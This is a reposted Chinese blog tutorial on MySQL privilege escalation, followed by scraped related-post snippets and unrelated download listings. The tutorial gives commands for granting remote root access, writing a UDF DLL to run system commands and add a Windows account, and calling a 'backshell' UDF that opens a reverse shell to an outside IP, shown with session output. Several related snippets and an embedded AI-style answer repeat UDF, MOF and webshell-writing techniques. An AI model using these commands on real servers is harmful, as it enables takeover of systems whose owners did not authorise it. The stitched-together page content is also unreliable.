Mysql提权总结

最新推荐文章于 2023-01-15 10:30:00 发布
转载 最新推荐文章于 2023-01-15 10:30:00 发布 · 69 阅读 · 0 ·
CC 4.0 BY-SA版权
原文链接:http://www.cnblogs.com/xiaozi/p/5993291.html

本文介绍了如何配置MySQL以允许外网访问,并探讨了通过PHPMyAdmin进行提权的方法,包括利用弱口令实现反弹端口连接提权的技术细节。

mysql默认状态下是不开放对外访问功能的

1、如何设置才能允许外网访问MySQL

使用“mysql -uroot -proot”命令可以连接到本地的mysql服务;

使用“use mysql”命令,选择要使用的数据库,修改远程连接的基本信息,保存在mysql数据库中,因此使用mysql数据库;

使用“GRANT ALL PRIVILEGES ON *.* TO 'root'@'%' IDENTIFIED BY 'root' WITH GRANT OPTION;”命令可以更改远程连接的设置;

使用“flush privileges;”命令刷新刚才修改的权限,使其生效;

使用“select host,user from user;”查看修改是否成功

2、phpmyadmin 连入提权

select @@basedir;  //Mysql安装目录

C:/phpStudy/MySQL/

CREATE TABLE udftest(udf BLOB);

INSERT into udftest values (CONVERT(,CHAR));CONVERT(这里换成你的UDF的HEX编码,CHAR));

SELECT udf FROM udftest INTO DUMPFILE 'C:\\phpStudy\\MySQL\\lib\\plugin\\udf.dll';-- 

select 'It is dll' into dumpfile 'C:\\phpStudy\\MySQL\\lib\\plugin::$INDEX_ALLOCATION'; 

DROP TABLE udftest;

create function cmdshell returns string soname 'udf.dll'
select cmdshell('net user xiaozi xiaozi /add');

参考链接: phpmyadmin直接提权 http://www.hack80.com/forum.php?mod=viewthread&tid=1304

             通过phpmyadmin各种技巧拿webshell  https://www.exehack.net/99.html

 

3、mysql弱口令(反弹端口连接提权)

假如我们扫到了一个mysql的root弱密码,并且可以外连,但是服务器上面的网站又无法Getshell,这时我们怎么办呢?

1、利用mysql客户端工具连接mysql服务器,然后执行下面的操作。

实验环境:phpStudy 默认安装的mysql数据库 5.5.40版本

C:\APMServ5\APMServ5.2.6\MySQL5.1\bin>mysql.exe -h 192.168.106.141 -u root -p
Enter password: ****
Welcome to the MySQL monitor.  Commands end with ; or \g.
Your MySQL connection id is 11
Server version: 5.5.40 MySQL Community Server (GPL)

Type 'help;' or '\h' for help. Type '\c' to clear the buffer.

mysql> \. c:\mysql.txt
Database changed
Query OK, 0 rows affected (0.02 sec)

Query OK, 0 rows affected (0.06 sec)

Query OK, 1 row affected (0.01 sec)

Query OK, 1 row affected (0.00 sec)
Rows matched: 1  Changed: 1  Warnings: 0

Query OK, 1 row affected (0.00 sec)

Query OK, 0 rows affected (0.09 sec)

+-------------------------------------------------------+
| backshell('')                                         |
+-------------------------------------------------------+
| 反弹shell.
例:select backshell("your IP",your port); |
+-------------------------------------------------------+
1 row in set (0.00 sec)


mysql> select backshell("192.168.106.137",2010);
+-----------------------------------+
| backshell("192.168.106.137",2010) |
+-----------------------------------+
| 执行成功
                        |
+-----------------------------------+
1 row in set (0.02 sec)


mysql> select backshell("192.168.106.137",2010);
+-----------------------------------------+
| backshell("192.168.106.137",2010)       |
+-----------------------------------------+
| 创建临时文件出错,backshell无法继续运行. |
+-----------------------------------------+
1 row in set (0.02 sec)

mysql> select @@version
    -> ;
+-----------+
| @@version |
+-----------+
| 5.5.40    |
+-----------+
1 row in set (0.00 sec)

mysql>

 

mysql.txt:

复制以上内容保存为mysql.txt即可。

 

参考文章:

mysql利用ntfs的ADS创建文件夹  http://blog.youkuaiyun.com/yiyefangzhou24/article/details/17190135

MYSQL提权总结   http://www.waitalone.cn/mysql-tiquan-summary.html?replytocom=390

 

转载于:https://www.cnblogs.com/xiaozi/p/5993291.html

an0708
关注
升-mysql总结
告白的博客
09-06 1291
0x00 mysql数据库方式简介 1)udf 2)mof 3)启动项-反弹shell-exp 思路:1.探针数据库的存在-端口服务,2.必须获取到数据库的限密码,3.数据库的类型分类 重点:数据库的账号密码获取方式, 1.网站配置文件sql data inc config conn database commin include等 2.读取数据库备份文件下的库中表等信息,数据库名/表名.MYD文件储存密码,例如mysql数据库在mysql_user表中储存账户密码,使用
mysql总结(自学)
m0_64481831的博客
03-17 2029
检测数据库的存在(探测端口)获取到数据库的限密码查看数据库的类型分类读取网站的配置文件读取数据库备份文件下的库中的表的信息,例如MySQL数据库在mysql_user表中存储账户密码,使用cmd5-mysql5解码暴力破解账户密码,需要支持外联(mysql默认不支持)。可以使用密码脚本在本地爆破,也可以使用工具如msf的scanner mysql_login模块MySQL数据库方式主要有三种使用sqlmap的--os-shell。
mysql _MYSQL总结
weixin_42515024的博客
01-18 599
经擦遇到了MYSQL数据库,想尽办法,最终都没有成功,很是郁闷,可能是自己很久没有研究过导致的吧,总结一下MYSQL的各种姿势吧,当复习了。关于mysql的方法也就那么几种,希望也能帮到各位小伙伴们。一、利用mof前段时间国外Kingcope大牛发布了mysql远程0day(MySQL WindowsRemote System Level Exploit (Stuxnet...
mysql总结
weixin_45605374的博客
12-12 933
udf UDF(user defined function)用户定义函数,是mysql的一次拓展连接⼝。用户可以通过自定义函数实现在mysql中⽆法例实现的功能,其新函数都可以在sql语句中添加中调使⽤,像调⽤本机函数⼀样。 前条件 已经获取到数据库的账号、密码,可以远程连接到 mysql有写入文件的限,即secure_file_priv的值为空。 show global variables like 'secure%'; mysql版本区别 1、MySQL<5.0,导出路径随意;
mysql_mysql总结
weixin_39996478的博客
01-18 206
一、mofwindows管理规范供了以下三种方法编译到WMI存储库的托管对象格式(MOF)文件:1、运行MOF文件指定为命令行参数讲Mofcomp.exe文件。2、使用IMofCompiler接口和$CompileFile方法。3、拖放到%SystemRoot%\System32\Wbem\MOF文件夹的MOF文件。Micrsoft建议您到存储库编译MOF文件使用前两种方法。也就是运行Mof...
mysql 5.0 _MYSQL总结
weixin_30016593的博客
01-19 391
经擦遇到了MYSQL数据库,想尽办法,最终都没有成功,很是郁闷,可能是自己很久没有研究过导致的吧,总结一下MYSQL的各种姿势吧,当复习了。关于mysql的方法也就那么几种,希望也能帮到各位小伙伴们。一、利用mof前段时间国外Kingcope大牛发布了mysql远程0day(MySQL Windows Remote System Level Exploit (Stuxne...
防止mysql_mysql总结方法四则
weixin_28679635的博客
01-19 532
一 UDF这类方法我想大家已经知道了,我大致写一下,具体语句如下:create function cmdshell returns string soname 'udf.dll'select cmdshell('net user iis_user 123!@#abcABC /add');select cmdshell('net localgroup administrators iis_u...
mysql 5.6.22 _MYSQL总结
weixin_39958112的博客
02-26 180
最近在测试一个项目,遇到了MYSQL数据库,想尽办法,最终都没有成功,很是郁闷,可能是自己很久没有研究过导致的吧,总结一下MYSQL的各种姿势吧,当复习了。关于mysql的方法也就那么几种,希望也能帮到各位小伙伴们。一、利用mof前段时间国外Kingcope大牛发布了mysql远程0day(MySQL Windows Remote System Level Exploit...
MYSQL总结
Jiajia2017的博客
06-02 275
最近在测试一个项目,遇到了MYSQL数据库,想尽办法,最终都没有成功,很是郁闷,可能是自己很久没有研究过导致的吧,总结一下MYSQL的各种姿势吧,当复习了。关于mysql的方法也就那么几种,希望也能帮到各位小伙伴们。 一、利用mof 前段时间国外Kingcope大牛发布了mysql远程0day(MySQL Windows Remote System Leve...
mysql导出dll_MYSQL总结
weixin_28882103的博客
02-28 309
最近在测试一个项目,遇到了MYSQL数据库,想尽办法,最终都没有成功,很是郁闷,可能是自己很久没有研究过导致的吧,总结一下MYSQL的各种姿势吧,当复习了。关于mysql的方法也就那么几种,希望也能帮到各位小伙伴们。一、利用mof前段时间国外Kingcope大牛发布了mysql远程0day(MySQL Windows Remote System Level Exploit...
MySQL总结(建议收藏)
xj28555的博客
09-08 885
原文地址:https://www.cnblogs.com/sfsec/p/15241860.html 前言 数据库限 在平常的渗透中,我们通常可以在一些特殊情况下得到数据库的用户名和密码(最高限root),如下: MySQL 3306 端口弱口令爆破 sqlmap 注入的 --sql-shell 模式 网站的数据库配置文件中拿到明文密码信息 CVE-2012-2122 等这类漏洞直接拿下 MySQL 限 口令爆破、sqlmap的--sql-shell模式和数据库配置文件中拿明文密码已经
web安全:mysql总结篇
Candour_0的博客
01-15 474
web安全:mysql总结篇
(11页PPT)第八单元读书明智24古人谈读书.pptx
12-29
(11页PPT)第八单元读书明智24古人谈读书.pptx
基于Spring Boot的即时出行汽车租赁管理系统的设计与实现源码.zip
12-29
基于Spring Boot的即时出行汽车租赁管理系统的设计与实现源码.zip
豌豆代理v1.1.4.2
最新发布
12-29
豌豆代理(又称豌豆 IP)是一款一站式国内代理 IP 服务平台,主打高匿名、低延迟、高可用的 IP 资源,支持 HTTP/HTTPS/SOCKS5 协议,适配 Windows、Mac、Android、iOS 多平台。 多类型 IP 资源与高覆盖节点 供动态住宅 IP、静态独享 IP、数据中心 IP,覆盖全国 200 + 城市,可用率 99%+;支持省市精准选择或全国混拨,适配不同业务合规与稳定性需求。 使用:在客户端 “节点 / 线路” 页,按城市 / 类型筛选,一键连接目标 IP,适合爬虫、电商多账号运营等场景。 秒级 IP 切换与灵活调度 支持手动一键切换、秒级动态切换(切换速度低至 100ms)、定时切换(自定义时长),并自动过滤重复 IP,避免重复使用导致风险。 使用:在 “设置” 中开启 “自动切换” 并设时间间隔,或按 Ctrl+Q 快捷键一键换 IP,适配反爬虫、批量测试等高频切换场景。 全协议支持与多端适配 兼容 HTTP/HTTPS/SOCKS5 主流代理协议,可对接浏览器、爬虫脚本、客户端软件;支持 Windows、Mac、安卓、iOS 多端同步使用,跨设备无缝切换。 使用:在客户端 “协议设置” 选择对应协议,生成代理地址与端口,直接填入目标软件即可生效。 隐私安全与数据加密 自研传输加密技术保护数据传输,搭配高匿名 IP 隐藏真实地址,同时支持自动清除 Cookie / 缓存,降低隐私泄露与追踪风险。 使用:在 “安全设置” 中开启 “数据加密” 与 “自动清理缓存”,公共 WiFi 环境下优先启用,升隐私防护等级。 智能筛选与稳定网络优化 系统自动筛选低延迟、高可用 IP,过滤失效 / 重复地址;依托自建纯净机房与独享带宽,搭配 BGP 多线接入,保障连接稳定性与速度。 使用:无需手动配置,客户端默认智能匹配合适节点,复杂网络环境可在 “网络
幼儿资源互助共享平台的设计
12-29
在网络高速发展的时代,众多的软件被开发出来,给用户带来了很大的选择余地,而且人们越来越追求更个性的需求。在这种时代背景下,商家只能以用户为导向,以商品的持续创新作为商家最重要的事项。 在新发展的时代,人们对幼儿资源互助共享平台越来越重视,才能实现幼儿资源互助共享平台的有效发挥,本文将通过幼儿资源互助共享平台的信息,分析在日常生活中对幼儿资源互助共享平台存在哪些问题探讨出进一步升效率,管理能力的对策。 系统采用了Java技术,将所有模块采用以浏览器交互的模式,选择MySQL作为系统的数据库,来进行系统的设计。基本实现了幼儿资源互助共享平台应有的主要功能模块,本系统有管理员:首页、个人中心、用户管理、卖家管理、咨询师管理、萌宝信息管理、幼儿知识管理、保姆推荐管理、音频资源管理、二手商品管理、商品分类管理、资源分类管理、交流论坛、系统管理,用户;首页、个人中心、萌宝信息管理、保姆推荐管理、音频资源管理,卖家;首页、个人中心、二手商品管理、订单管理,咨询师;首页、个人中心、幼儿知识管理,前台首页;首页、萌宝信息、幼儿知识、保姆推荐、音频资源、二手商品、交流论坛、个人中心、后台管理、购物车等功能。 对系统进行测试后,改善了程序逻辑和代码。同时确保系统中所有的程序都能正常运行,所有的功能都能操作,本系统的开发获取幼儿资源互助共享平台信息能够更加方便快捷,同时也使幼儿资源互助共享平台信息变的更加系统化、有序化。系统界面较友好,易于操作。
2026年AI证书闭眼冲!全行业适配清单,CAIE证书先看这波
12-29
全行业适配清单
9746f90213a4a3a921a95875cc91cfe6_201622229522151034_m.zip
12-29
9746f90213a4a3a921a95875cc91cfe6_201622229522151034_m.zip
awt135_stockviewer_31160_1766920461421.zip
12-29
awt135_stockviewer_31160_1766920461421.zip
mysql
04-03
<think>好的,我现在需要处理用户关于MySQL方法和解决方案的查询。首先,我需要确保自己正确理解用户的需求。用户想知道如何通过MySQL进行升,或者如何防御这类攻击。这可能涉及已知的漏洞利用、配置错误或不当的限设置。 接下来,我需要回忆相关的MySQL技术。常见的方法包括利用UDF(用户定义函数)漏洞、利用系统命令执行漏洞如利用写限到特定目录、通过MySQL服务运行系统命令,或者利用SQL注入结合服务器配置不当来限。 然后,我需要验证这些方法是否仍然有效,以及是否有最新的防御措施。例如,UDF在较早版本的MySQL中较为常见,但现代版本可能已经限制了动态链接库的加载路径。此外,secure_file_priv的设置可能会影响文件写入的能力,这也是需要考虑的因素。 用户供的引用中到了Monstra CMS和Sequelize ORM,但这些似乎与MySQL没有直接关联。不过,引用3到技术源码的合法使用,这可能醒我在回答时强调合法和道德的应用,避免供可用于非法目的的信息。 接下来,我需要组织回答结构,分点说明方法和解决方案。在方法部分,我需要详细说明UDF、利用系统命令执行、写WebShell等方法,并给出具体的步骤示例,同时指出这些方法的前条件,如需要高限的MySQL账户。 在解决方案部分,应该强调限最小化原则、安全配置、日志监控、定期更新补丁等措施。需要醒用户避免使用root限运行MySQL服务,限制文件写入目录,以及禁用不必要的功能。 同时,必须注意用户供的引用中到的法律免责声明,确保回答符合道德规范,不鼓励或支持非法活动。因此,在回答中应加入警告,强调这些信息仅用于防御目的,并建议在合法授范围内进行测试。 最后,生成相关问题,帮助用户进一步理解相关主题,例如如何检测MySQL漏洞、防御UDF的最佳实践,以及MySQL限管理的关键点。这些问题应围绕用户的核心需求展开,供更多学习路径。 总结来说,我需要确保回答准确、全面,同时遵守法律和道德准则,避免供可能被滥用的技术细节。此外,保持回答的结构清晰,分点说明,便于用户理解和应用。</think>### MySQL方法与防御方案 #### 一、常见方法 1. **UDF** - 通过自定义函数库(如`lib_mysqludf_sys.so`或`dll`)执行系统命令 - 前条件:MySQL用户需有`INSERT`和`EXECUTE`限 - 步骤示例: ```sql CREATE FUNCTION sys_exec RETURNS INTEGER SONAME 'udf.dll'; SELECT sys_exec('whoami'); ``` 2. **利用系统命令执行漏洞** - 通过`INTO OUTFILE`写入恶意脚本到可执行目录 ```sql SELECT 'system("id")' INTO OUTFILE '/var/www/shell.php'; ``` - 需要`FILE`限且`secure_file_priv`未限制目标路径[^1] 3. **利用MySQL服务限** - 若MySQL以root运行(常见于配置不当),通过执行`sudo`命令直接 - 示例:通过`mysql`命令行调用系统命令 ```bash mysql -e '\! bash' ``` --- #### 二、防御解决方案 1. **限最小化** - 禁止使用root账户运行MySQL服务,改用专用低限用户 - 限制MySQL用户的限:禁止`FILE`、`PROCESS`、`SUPER`等高危限[^3] 2. **安全配置** - 设置`secure_file_priv`为不可写目录(如`/dev/null`) - 禁用`LOAD DATA LOCAL INFILE`防止文件读取攻击 - 更新至最新版本以修复已知漏洞 3. **日志与监控** - 启用审计日志(`audit_log`插件)记录敏感操作 - 监控异常查询(如`SELECT ... INTO OUTFILE`) 4. **文件系统保护** - 限制Web目录写入限,防止WebShell上传 - 使用SELinux/AppArmor限制MySQL进程行为 --- #### 三、关键风险场景 - **旧版本漏洞**:如CVE-2016-6662(限覆盖漏洞)需及时修补 - **插件滥用**:禁用非必要插件(如`lib_mysqludf_sys`) - **弱密码攻击**:强制使用强密码策略,启用失败登录锁定 ---
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符  | 博主筛选后可见
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值